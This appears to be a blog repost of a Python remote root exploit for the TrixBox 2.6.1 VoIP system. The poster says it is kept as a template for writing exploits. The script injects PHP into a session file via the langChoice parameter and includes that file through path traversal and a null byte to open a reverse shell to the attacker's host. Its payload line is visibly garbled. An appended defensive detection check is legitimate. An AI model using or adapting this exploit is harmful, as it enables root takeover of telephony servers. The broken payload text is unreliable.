TrixBox 2.6.1 langChoice remote root exploit

# TrixBox 2.6.1 langChoice remote root exploit
# muts from offensive-security.com
# chris from offensive-security.com
# All credits to Jean-Michel BESNARD
# Same same, but different.
# http://www.offensive-security.com/0day/trixbox.py.txt
################################################################################
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6
# (disk),10(wheel)
# uname -a
# Linux trixbox1.localdomain 2.6.25.7 #4 SMP Tue Jun 17 19:35:11 EDT 2008 i686 # i686 i386 GNU/Linux
################################################################################

import sys
from socket import *
import re
import os
from time import sleep

print ("[*] BY THE POWER OF GRAYSKULL - I HAVE THE ROOTZ0R!/r/n"
"[*] TrixBox 2.6.1 langChoice remote root exploit /r/n"
"[*] http://www.offensive-security.com/0day/trixbox.py.txt/r/n")

if (len(sys.argv)!=5):
	print "[*] Usage: %s " % sys.argv[0]
	exit(0)

host=sys.argv[1]
port=int(sys.argv[2])
lhost=sys.argv[3]
lport=int(sys.argv[4])


def create_post(injection):
        buffer=("POST /user/index.php HTTP/1.1 /r/n"
        "Host: 192.168.219.132 /r/n"
        "Content-Type: application/x-www-form-urlencoded /r/n"
        "Content-Length: "+str(len(injection))+"/r/n/r/n" +injection)
        return buffer

def send_post(host,port,input):
	s = socket(AF_INET, SOCK_STREAM)
	s.connect((host, port))
	s.send(input)
	output=s.recv(1024)
	s.close()
	return output

def find_sessionid(http_output):
	headers=re.split("/n",http_output)
	for header in headers:
	        if re.search("Set-Cookie",header):
           	    	cook=header.split(" ")
			sessionid=cook[1][10:42]
	                print "[*] Session ID is %s" % sessionid
			return sessionid


print "[*] Injecting reverse shell into session file"
bash_inject="langChoice=
       
       %260 2>%260/");?>" 
reverse=create_post(bash_inject)
raw_session=send_post(host,port,reverse)

print "[*] Extracting Session ID"
id=find_sessionid(raw_session)

print "[*] Triggering Reverse Shell to %s %d in 3 seconds" % (lhost,lport)
sleep(3)
print "[*] Skadush! /r/n[*] Ctrl+C to exit reverse shell."
tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00')
send_post(host,port,tmpsession)

print "[*] Cleaning up"
cleanup=create_post('langChoice=english')
send_post(host,port,cleanup)
send_post(host,port,cleanup)
print "[*] Done!"

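 Trixbox is an IP-PBX-based VoIP telephony system. As of June 13, the latest released version is 2.6.1, and the official website is http://www.trixbox.org. Someone published a remote root exploit on milw0rm, written in Python. Since I have been learning Python for the last 12 days, it looks especially familiar, so I am saving it here to make it easier to write my own exploits later :)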
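A defender-side check for the requests this script sends, as an added example that is not part of the original post or the exploit: it flags POST bodies to /user/index.php whose langChoice carries traversal sequences, a null byte, a sess_ file reference or PHP tags, including nested percent-encoding. The function names, the safe-value pattern and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Assumption: legitimate values are plain language names such as "english".
SAFE_LANG = re.compile(r"[A-Za-z_]{1,32}")

def _fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %252e) before inspecting the value."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def check_langchoice(body):
    """Return the reasons a urlencoded POST body's langChoice looks hostile."""
    reasons = []
    for key, raw in parse_qsl(body, keep_blank_values=True):
        if key != "langChoice":
            continue
        value = _fully_decode(raw)
        if "\x00" in value:
            reasons.append("null byte")
        if "../" in value or "..\\" in value:
            reasons.append("path traversal")
        if "sess_" in value:
            reasons.append("session file reference")
        if "<?" in value or "?>" in value:
            reasons.append("php tag")
        if not reasons and not SAFE_LANG.fullmatch(value):
            reasons.append("not a plain language name")
    return reasons

def scan(requests):
    """requests: iterable of (source, path, body); returns (source, reasons)."""
    hits = ((src, check_langchoice(body)) for src, path, body in requests
            if path == "/user/index.php")
    return [(src, reasons) for src, reasons in hits if reasons]

# Constructed sample requests (documentation addresses, harmless bodies).
SAMPLE = [
    ("192.0.2.10", "/user/index.php", "langChoice=english"),
    ("192.0.2.66", "/user/index.php", "langChoice=%3C%3F+marker+%3F%3E"),
    ("192.0.2.66", "/user/index.php", "langChoice=../../tmp/sess_" + "a" * 32 + "%00"),
]
if __name__ == "__main__":
    for source, reasons in scan(SAMPLE):
        print(source, ", ".join(reasons))
```

The same test belongs server-side as an allowlist on langChoice before it reaches any file include, so the log check is a backstop and not the only control.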

 
